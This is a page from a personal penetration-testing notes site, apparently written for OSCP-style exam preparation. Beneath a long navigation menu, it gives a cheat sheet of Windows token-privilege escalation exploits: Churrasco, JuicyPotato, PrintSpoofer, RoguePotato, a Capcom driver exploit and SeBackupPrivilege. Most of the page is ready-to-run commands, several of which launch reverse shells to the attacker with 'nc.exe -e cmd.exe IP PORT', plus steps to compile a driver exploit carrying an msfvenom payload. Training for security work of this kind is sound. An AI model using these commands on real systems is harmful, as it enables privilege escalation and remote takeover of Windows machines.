💎
kashz-jewels
  • kashz jewels
  • about kashz
  • oscp exam review
  • pnpt exam review
  • certification exam
  • c2 frameworks
  • kashz-kali
  • OS-LINUX
    • basic
    • linux-enumeration
      • enumeration auto
      • enumeration manual
    • linux-privilege-escalation
      • socat shells
      • sudo su styles
      • dirtyc0w
  • OS-WINDOWS
    • basic
    • windows-enumeration
      • enumeration auto
      • enumeration manual
      • enumeration tools
    • windows-privilege-escalation
      • privesc tools
      • steal NTLM creds
      • socat shells
      • beef browser exploitation
    • windows-post-exploitation
      • dump SAM SYSTEM
      • RDP tools
    • windows-bypass-uac
      • fodhelper
    • windows meterpreter
  • SHELLCODES
    • shells
    • windows shells
  • ACTIVE-DIRECTORY
    • active directory 101
    • kerberos 101
    • asrep roasting
    • kerberoasting
    • powerview.ps1
    • ad module
    • bloodhound
    • golden silver passing ticket
    • group policy management
    • dcsync
    • kerberos backdoor
    • mitm6
    • smb relay ntlmrelayx
    • responder
    • zero logon exploit
    • untested tools
  • OSINT
    • osint
  • BUFFER OVERFLOW GUIDE
    • exploit.py
    • fuzzer.py
    • methodology
  • HASH-n-CRACK
    • crackmapexec
    • hash identifier
    • hashcat
    • hydra
    • john the ripper
    • medusa
    • ncrack
    • rsa
  • TRICKS
    • .mdb file
    • 403 forbidden waf bypass
    • archive, unarchive
    • asp.net server
    • awscli
    • bash scripting
    • bypass bash restrictions
    • curl
    • ffuf wfuzz feroxbuster gobuster
    • file modification
    • git commands
    • git repo analysis
    • http request smuggling
    • json web token (jwt)
    • kali exploit compilation
    • kali multi-network adapters
    • local discovery
    • login bypass
    • magic bytes
    • nmap
    • office document analysis and exploitation
    • openvpn
    • pgp gpg cheatsheet
    • php wrappers, LFI
    • port forwarding
    • port knocking
    • post upload file
    • share files
    • ssh tunnel
    • subnet scan
    • ssh
    • wget
    • wifi
    • windows AppLocker bypass
    • wordlists
    • xss steal cookie
  • PROTOCOLS
    • dns :53
    • epmd :4369
    • ftp :21
    • ident :113
    • imap :143 :993
    • ipsec ike-vpn :500/udp
    • irc
    • ldap :389 :636 :3268 :3269
    • rpc
    • smb :135 :139 :445
    • smtp :25
    • subversion svn :3690
    • tftp :69
  • ATTACKS
    • .hta exploit
    • network scripts
    • print nightmare
    • ssrf
    • xml external entity XXE
  • CHEATSHEET
    • docker
    • drupal
    • gitlab rails
    • impacket guide
    • itemir/apache2fa
    • jenkins
    • jinja2 flask template injection
    • mimikatz
    • powershell
    • redis
    • sqli oracle odat
    • sqli basic
    • sqli influxql
    • sqli mongo
    • sqli ms-sql
    • sqli mysql
    • sqli oracle-sql
    • sqli postgres-sql
    • telnet
    • webdav
    • wordpress
  • SERVICES
    • achat
    • adminLTE
    • adminer.php
    • comment system
    • amanda
    • apache
    • apache exploits
    • apphp microblog
    • arj
    • azure cloud
    • b2evolution
    • bigtree cms
    • bludit cms
    • booked scheduler
    • cacti
    • centreon
    • chef knife
    • cloudMe
    • cms made simple
    • cmsmini
    • coldfusion
    • corehttp
    • cs cart
    • cse online bookstore
    • cuppa cms
    • cutenews cms
    • distccd (DistCC Daemon)
    • docker
    • dolphin2 cms
    • dosbox
    • drupal
    • elastic freepbx
    • elasticsearch kibana
    • epmd
    • exim
    • fail2ban
    • ftp exploits
    • fudforum
    • gitlab community edition
    • gunicorn
    • gym management system
    • h2 database
    • hp power manager
    • iis
    • james remote admin tool
    • jenkins exploits
    • katris
    • koken cms
    • ladon framework
    • laravel
    • lxd
    • magento
    • manage engine applications manager
    • manage engine service desk plus
    • mantis bugtracker
    • monstra cms
    • msfvenom apk
    • mysql exploit
    • nagios xi
    • network video monitoring system
    • nextcloud
    • nginx
    • nodebb
    • nostromo
    • nsclient
    • nsupdate
    • openNetAdmin ona
    • opendocman
    • openemr
    • opensmtpd
    • osclass
    • orient-db-server
    • otrs open ticket request system
    • ovidentia
    • pfsense
    • php file vault
    • php powerbrowse
    • php
    • phpliteadmin
    • phpmyadmin
    • phreebooks bizuno
    • plantronics hub
    • postfix smtp
    • postgres
    • python2 python3
    • quick cms
    • rabbitmq
    • raspAP
    • rconfig management
    • redis exploits
    • rejetto httpfileserver
    • remote-mouse
    • responsive filemanager
    • saltstack
    • sendmail
    • simple php photo gallery
    • small crm
    • smartermail
    • smartstore.net
    • smb exploits
    • sonatype nexus
    • splunk universal forwarder
    • ssh exploits
    • strapi cms
    • subrion cms
    • sudo
    • teamviewer
    • tmux
    • tomcat
    • umbraco
    • unifi video
    • unreal irc
    • usbcreator
    • vtiger crm
    • webcalendar
    • webmin :10000
    • werkzeug httpd
    • windows UsoSvc service
    • windows exploits
    • windows iot core
    • windows token exploits
    • wise care 365, wisebootassistant
    • wordpress plugin exploits
    • xampp
    • yaml
    • yum
    • zabbix
    • zenphoto cms
    • zookeeper exhibitor
Powered by GitBook
On this page
  • Churrasco
  • HotPotato
  • JuicyPotato
  • PrintSpoofer
  • RoguePotato
  • SeLoadDriverPrivilege
  • Steps:
  • SeBackupPrivilege

Was this helpful?

  1. SERVICES

windows token exploits

Previouswindows iot coreNextwise care 365, wisebootassistant

Last updated 3 years ago

Was this helpful?

Churrasco

REQUIREMENTS:

  • SeImpersonalPrivilege

  • Windows XP/VISTA/2003/2008, Win Server 2003

# usage
> churrasco.exe -d "nc.exe -e cmd.exe IP PORT"

HotPotato

  • Windows 7,8,10, Server 2008, Server 2012

REQUIREMENTS:

  • SeImpersonatePrivilege

  • machine is < Windows 10 1809 < Windows Server 2019

  • CLSID:

    • Can use

  • Try: {03ca98d6-ff5d-49b8-abc6-03dd84127020}

> JuicyPotato.exe -l 1337 -p "c:\windows\system32\cmd.exe" -a "/c PATH\nc.exe -e cmd.exe IP PORT" -t * -c CLSID
> Juicy.Potato.x86.exe -l 1337 -p "c:\users\public\kashz.exe" -t * -c CLSID

> PSExec64.exe -i -u "nt authority\local service" <shell.exe>

REQUIREMENTS:

  • SeImpersonatePrivilege

  • Win10, Server 2016, Server 2019

> PrintSpoofer.exe -i -c cmd.exe
> PrintSpoofer.exe -c "nc.exe IP PORT -e cmd.exe"
# -i : interactive
# -c : command to run

REQUIREMENTS:

  • SeImpersonatePrivilege

  • machine is >= Windows 10 1809 & Windows Server 2019

# socat redirector for OXID resolving, must use 135
$ socat tcp-listen:135,reuseaddr,fork tcp:KALI_IP:9999
> RoguePotato.exe -r KALI_IP -e "PATH\nc.exe IP PORT -e cmd.exe" -l 9999

REQUIREMENTS:

  • Visual Studio to compile

Steps:

  1. obtain user SID

    1. Get-ADUser -Identity 'svc-print' | select SID

    2. (New-Object System.Security.Principal.NTAccount("svc-print")).Translate([System.Security.Principal.SecurityIdentifier]).value

  2. Generate .exe msfvenom reverse shell

  3. Update path to reverse shell on target line 410 in file ExploitCapcom.cpp

  4. Set for RELEASE

  5. Build Solution

  6. run .\ExploitCapcom.exe

SeBackupPrivilege

Clone Repo:

JuicyPotato
http://ohpe.it/juicy-potato/CLSID/
http://ohpe.it/juicy-potato/CLSID/GetCLSID.ps1
PrintSpoofer
RoguePotato
SeLoadDriverPrivilege
tandasat/ExploitCapcom/
https://github.com/giuliano108/SeBackupPrivilege